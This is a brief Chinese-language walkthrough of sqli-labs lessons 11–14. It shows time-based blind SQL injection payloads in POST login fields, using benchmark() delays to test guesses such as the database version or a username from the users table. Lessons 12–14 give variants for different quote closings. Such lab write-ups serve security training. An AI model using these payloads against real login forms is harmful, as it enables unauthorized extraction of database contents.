Less-11
这个页面采用POST的方法得到数据。于是用HackBar修改post数据进行测试:
uname=admin&passwd=password' and benchmark(10000000,sha(1))#&submit=Submit
测试发现,这个格式的注入使得服务器返回页面变慢,得知之后的benchmark语句得到执行。
所以再构造类似于
uname=admin&passwd=password' and left(version(),1)=5 and benchmark(10000000,sha(1))#&submit=Submit
的语句。如果返回结果变慢,则前面的left函数得到的结果是正确的,才会运行之后的benchmark函数。通过这种方法,可以一点一点地得到数据库的数据。
示例:
uname=admin&passwd=password' and left((select username from users where id = 1),4)='Dumb' and benchmark(10000000,sha(1))#&submit=Submit
Less-12
同上:
password") and benchmark(10000000,sha(1))#&submit=Submit
Less-13
password') and benchmark(10000000,sha(1))#&submit=Submit
Less-14
password" and benchmark(10000000,sha(1))#&submit=Submit
文章评论